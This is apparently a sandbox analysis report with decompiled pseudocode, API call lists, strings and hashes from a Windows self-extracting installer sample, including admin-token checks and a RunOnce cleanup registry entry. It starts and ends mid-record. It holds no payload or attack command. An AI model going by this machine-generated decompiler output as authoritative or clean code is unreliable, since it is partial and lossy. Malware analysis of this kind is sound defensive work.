										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "siga30", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0125681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E012567C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "siga30", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E01256CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x012544b9
0x012544c4
0x012544cb
0x012544d8
0x012544e4
0x012544eb
0x012544ee
0x012544ef
0x012544ef
0x012544f1
0x012544f7
0x012544f8
0x0125467b
0x012544fe
0x01254509
0x01254518
0x01254525
0x01254562
0x01254568
0x01254568
0x0125456b
0x0125456b
0x0125456d
0x0125456e
0x01254572
0x01254578
0x0125457c
0x012545cb
0x01254607
0x01254607
0x0125460d
0x01254613
0x01254617
0x00000000
0x0125461d
0x01254623
0x01254626
0x01254628
0x00000000
0x01254628
0x012545cd
0x012545cd
0x012545cf
0x012545cf
0x012545d2
0x012545d2
0x012545d4
0x012545d5
0x012545db
0x012545de
0x012545e3
0x012545e9
0x012545ed
0x00000000
0x012545f3
0x012545fd
0x00000000
0x01254602
0x012545ed
0x0125457e
0x0125457e
0x01254580
0x01254580
0x01254583
0x01254583
0x01254585
0x01254586
0x0125458a
0x0125458c
0x0125458f
0x0125458f
0x01254591
0x01254592
0x0125459b
0x0125459e
0x012545a3
0x012545a9
0x012545ad
0x00000000
0x012545af
0x012545af
0x012545bf
0x0125462d
0x01254630
0x0125463d
0x0125464e
0x0125464e
0x0125463f
0x01254640
0x01254647
0x0125464c
0x00000000
0x00000000
0x0125464c
0x01254666
0x0125466d
0x0125466f
0x01254675
0x01254675
0x012545ad
0x01254527
0x0125452e
0x0125453f
0x0125453f
0x01254530
0x01254531
0x01254538
0x0125453d
0x00000000
0x00000000
0x0125453d
0x01254554
0x0125455a
0x0125455a
0x0125455a
0x01254525
0x0125468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554
LocalAlloc.KERNEL32(00000040,00000065), ref: 012545A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 012545E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0125460D
MessageBeep.USER32(00000000), ref: 01254630
MessageBoxA.USER32(?,00000000,siga30,00000000), ref: 01254666
LocalFree.KERNEL32(00000000), ref: 0125466F

Part of subcall function 0125681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0125686E
Part of subcall function 0125681F: GetSystemMetrics.USER32(0000004A), ref: 012568A7
Part of subcall function 0125681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 012568CC
Part of subcall function 0125681F: RegQueryValueExA.ADVAPI32(?,01251140,00000000,?,?,0000000C), ref: 012568F4
Part of subcall function 0125681F: RegCloseKey.ADVAPI32(?), ref: 01256902

Strings

siga30, xrefs: 01254545, 0125465A
LoadString() Error. Could not load string resource., xrefs: 012544E4

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$siga30
API String ID: 3244514340-1850386852
Opcode ID: c2589cb7243adf8e6ade1e3f0100d60b9a3a99144980b4a95ca3e7dce77b7f16
Instruction ID: a2faecf917870f046b9ac14cd54422aed4bc19b3d4c957063fad797497eaa720
Opcode Fuzzy Hash: c2589cb7243adf8e6ade1e3f0100d60b9a3a99144980b4a95ca3e7dce77b7f16
Instruction Fuzzy Hash: 1F512971910256AFDB61AE28ECCDBB6BBB9EF45304F004194FE09A3205EB71DD85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01252773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E01252773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x1258004; // 0x958f311c
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E01251781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0125658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0125658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x1251140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E01251680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E01256CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x01252773
0x0125277e
0x01252785
0x0125278a
0x0125278d
0x01252790
0x01252792
0x01252798
0x0125279d
0x012528b2
0x00000000
0x012527a3
0x012527a3
0x012527af
0x012527c2
0x012527c8
0x012527cd
0x012527d5
0x012528b7
0x012528b9
0x00000000
0x012527db
0x012527dd
0x012528aa
0x00000000
0x012527e3
0x012527e3
0x012527ec
0x012527f8
0x01252803
0x0125280b
0x01252831
0x012528c3
0x012528c9
0x012528cd
0x01252837
0x0125285a
0x0125285c
0x01252865
0x01252892
0x01252895
0x00000000
0x00000000
0x01252867
0x01252878
0x0125288c
0x00000000
0x0125287a
0x01252880
0x01252885
0x01252897
0x01252899
0x01252899
0x01252878
0x01252865
0x012528a0
0x012528bf
0x012528c1
0x00000000
0x00000000
0x012528c1
0x01252831
0x012527dd
0x012527d5
0x012528e5

APIs

CharUpperA.USER32(958F311C,00000000,00000000,00000000), ref: 012527A8
CharNextA.USER32(0000054D), ref: 012527B5
CharNextA.USER32(00000000), ref: 012527BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01252829
RegQueryValueExA.ADVAPI32(?,01251140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01252852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01252870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 012528A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 012528AA
GetSystemDirectoryA.KERNEL32 ref: 012528B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 012527E4

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 57f1a5951a1f2a744e2d43f97e56944cb0cf4732f36698c3911a8eddf99b4971
Instruction ID: 54f6365014ca45d4ab44a327b3ef8e72d30d9a5d1c45bbee0795ae6cd3fd59ed
Opcode Fuzzy Hash: 57f1a5951a1f2a744e2d43f97e56944cb0cf4732f36698c3911a8eddf99b4971
Instruction Fuzzy Hash: 4E418671920128EFDB659B649CC9BFA7BBDEF55710F0040A9FA45E3144DBB04E858FA0

Uniqueness

Uniqueness Score: -1.00%

Function 01252267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E01252267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x1258004; // 0x958f311c
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x1258530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0125658A( &_v268, 0x104, 0x1251140);
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\");
							E0125171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E01256CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x01252272
0x01252277
0x01252279
0x01252283
0x01252289
0x012522ab
0x012522b1
0x012522c4
0x012522e0
0x012522e6
0x012522f5
0x0125230d
0x0125231c
0x0125231c
0x01252321
0x0125233a
0x01252342
0x01252348
0x0125234b
0x0125234c
0x0125234c
0x0125234e
0x0125234f
0x0125236e
0x0125236e
0x0125237a
0x01252380
0x01252380
0x01252381
0x01252381
0x0125238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 012522A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 012522D8
memset.MSVCRT ref: 012522F5
GetSystemDirectoryA.KERNEL32 ref: 01252305
RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0125236E
RegCloseKey.ADVAPI32(?), ref: 0125237A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01252321
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01252299
wextract_cleanup2, xrefs: 0125227C, 012522CD, 01252363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0125232D

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
API String ID: 3027380567-1417727283
Opcode ID: 62942701aaf8461af865883001c1a850e2d2ddefd7de8b94bad8e210a41d87ec
Instruction ID: 4807d9f4393319badf2845f7b35160e503254d5c703f70491dccf84fc56ea1de
Opcode Fuzzy Hash: 62942701aaf8461af865883001c1a850e2d2ddefd7de8b94bad8e210a41d87ec
Instruction Fuzzy Hash: 8A31C871A20218ABDB719B55ECC9FEB7B7CEF14714F0001E9B90DA6041DA70AB84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01253100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E01253100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x1258590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x1258590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E012543D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x1258d4c);
					SetWindowTextA(_t33, "siga30");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x12588b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E012530C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x01253108
0x0125310b
0x012531b7
0x012531ca
0x012531d0
0x012531d0
0x012531da
0x00000000
0x012531da
0x01253111
0x01253114
0x01253136
0x01253136
0x01253138
0x0125313b
0x01253141
0x00000000
0x01253143
0x01253116
0x0125311b
0x0125314b
0x01253151
0x01253158
0x0125316a
0x01253176
0x0125317d
0x0125318b
0x0125319e
0x012531a3
0x00000000
0x012531ad
0x01253120
0x00000000
0x00000000
0x0125312a
0x01253134
0x00000000
0x00000000
0x00000000
0x01253134
0x0125312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0125313B
GetDesktopWindow.USER32 ref: 0125314B
SetDlgItemTextA.USER32(?,00000834), ref: 0125316A
SetWindowTextA.USER32(?,siga30), ref: 01253176
SetForegroundWindow.USER32(?), ref: 0125317D
GetDlgItem.USER32(?,00000834), ref: 01253185
GetWindowLongA.USER32(00000000,000000FC), ref: 01253190
SetWindowLongA.USER32(00000000,000000FC,012530C0), ref: 012531A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 012531CA

Strings

siga30, xrefs: 01253170

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: siga30
API String ID: 3785188418-2499866817
Opcode ID: b65f83e598711ada0961b9986b096299c12beaea052285da3e9bcf266f83aa5a
Instruction ID: 46ff542886668664ba02586b2a50d0e04a52649f8c0061127c05e27f0ae90c7d
Opcode Fuzzy Hash: b65f83e598711ada0961b9986b096299c12beaea052285da3e9bcf266f83aa5a
Instruction Fuzzy Hash: 7D11A231224322BBDB619B38BC8EB6A3E74FB467A1F009610FE15D2188DBB08541C751

Uniqueness

Uniqueness Score: -1.00%

Function 012518A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E012518A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x1258004; // 0x958f311c
				_v8 = _t23 ^ _t53;
				_t25 =  *0x1258128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E01256CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E012517EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x1258128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x1258128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x012518a3
0x012518a3
0x012518ab
0x012518b2
0x012518b5
0x012518be
0x012518c0
0x012518c6
0x012518c7
0x012518ca
0x012518cf
0x012519c9
0x012519d8
0x012519d8
0x012518df
0x012519b8
0x012519bd
0x012519bf
0x012519bf
0x00000000
0x012519bd
0x012518fa
0x00000000
0x00000000
0x01251912
0x012519aa
0x012519ad
0x012519b3
0x00000000
0x01251927
0x01251927
0x01251932
0x01251936
0x012519a9
0x012519a9
0x00000000
0x012519a9
0x0125194c
0x012519a2
0x012519a3
0x00000000
0x0125196e
0x01251970
0x01251999
0x0125199c
0x00000000
0x0125199c
0x01251972
0x01251972
0x01251975
0x01251984
0x01251985
0x0125198a
0x00000000
0x00000000
0x00000000
0x0125198c
0x01251991
0x01251996
0x00000000
0x01251996
0x0125194c

APIs

Part of subcall function 012517EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,012518DD), ref: 0125181A
Part of subcall function 012517EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0125182C
Part of subcall function 012517EE: AllocateAndInitializeSid.ADVAPI32(012518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,012518DD), ref: 01251855
Part of subcall function 012517EE: FreeSid.ADVAPI32(?,?,?,?,012518DD), ref: 01251883
Part of subcall function 012517EE: FreeLibrary.KERNEL32(00000000,?,?,?,012518DD), ref: 0125188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 012518EB
OpenProcessToken.ADVAPI32(00000000), ref: 012518F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0125190A
GetLastError.KERNEL32 ref: 01251918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0125192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 01251944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01251964
EqualSid.ADVAPI32(00000004,?), ref: 0125197A
FreeSid.ADVAPI32(?), ref: 0125199C
LocalFree.KERNEL32(00000000), ref: 012519A3
CloseHandle.KERNEL32(?), ref: 012519AD

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 1b9673ed9ecb584fb56781459481a58f6686a0daab9d1070a55ccb9e7ef4e318
Instruction ID: 116781cccd5f8f39d08a6c7933dc302af9a5385223523948ffd9b8c61efa1b0f
Opcode Fuzzy Hash: 1b9673ed9ecb584fb56781459481a58f6686a0daab9d1070a55ccb9e7ef4e318
Instruction Fuzzy Hash: CB313971A1020AAFDB619FAAECC9BBFBBB8FF04310F104529EA45D2144D7309954CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0125468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0125468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x01254699
0x0125469b
0x012546a9
0x012546af
0x012546b4
0x012546bc
0x012546f9
0x00000000
0x012546f9
0x012546d9
0x012546dd
0x00000000
0x00000000
0x012546e5
0x012546ef
0x00000000
0x012546f5
0x012546ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
memcpy_s.MSVCRT ref: 012546E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

Strings

siga30, xrefs: 012546E4
TITLE, xrefs: 0125469D, 012546C0

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$siga30
API String ID: 3370778649-532272691
Opcode ID: 4d30cf0ceb73f7ae537ab84a2836abb8df1558a9f03ec46bd847c850baedb63a
Instruction ID: c8b3cdb3bee9a764a916615c5cced8c3fd613601a79e6d80ee6b511e4d86143f
Opcode Fuzzy Hash: 4d30cf0ceb73f7ae537ab84a2836abb8df1558a9f03ec46bd847c850baedb63a
Instruction Fuzzy Hash: 53016236254351BFE36026A96C8EF6BBE2CDB85B91F044214FF4997148D9B1888187B5

Uniqueness

Uniqueness Score: -1.00%

Function 012517EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E012517EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x1258004; // 0x958f311c
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x125a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E01256CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x012517f6
0x012517fd
0x01251805
0x0125180b
0x0125180d
0x01251815
0x01251818
0x01251820
0x01251824
0x0125182c
0x01251832
0x01251837
0x01251851
0x01251854
0x0125185d
0x01251862
0x0125186c
0x01251872
0x01251877
0x0125187e
0x0125187e
0x01251883
0x01251883
0x0125185d
0x0125188a
0x0125188a
0x012518a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,012518DD), ref: 0125181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0125182C
AllocateAndInitializeSid.ADVAPI32(012518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,012518DD), ref: 01251855
FreeSid.ADVAPI32(?,?,?,?,012518DD), ref: 01251883
FreeLibrary.KERNEL32(00000000,?,?,?,012518DD), ref: 0125188A

Strings

advapi32.dll, xrefs: 01251810
CheckTokenMembership, xrefs: 01251826

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: f8d72a6d432ba35b3a7279e74d4407a5a1f3de01a91c6f6661c34dce9d4fa16a
Instruction ID: a8714c9df16007fafb7914f4b305f08463e1ea19446dc6670fd33c44a059d9f1
